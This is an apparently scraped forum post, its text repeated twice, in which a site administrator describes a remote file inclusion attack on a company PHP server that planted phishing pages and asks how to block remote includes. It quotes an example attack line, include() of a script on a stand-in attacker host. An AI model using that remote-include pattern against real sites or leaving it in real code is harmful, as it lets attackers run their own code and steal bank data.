Hi all,
Recently my company server has been attacked by phishers who are using a website vulnerabilty to upload files and get bank accounts information. We have been contacted by the bank and we fixed the problem within the website but I still got a question:
The hack attempt was done using the remote include ability of PHP, I mean they exploded the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.
I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.
Any suggestion? Thanks in advance!
Recently my company server has been attacked by phishers who are using a website vulnerabilty to upload files and get bank accounts information. We have been contacted by the bank and we fixed the problem within the website but I still got a question:
The hack attempt was done using the remote include ability of PHP, I mean they exploded the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.
I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.
Any suggestion? Thanks in advance!
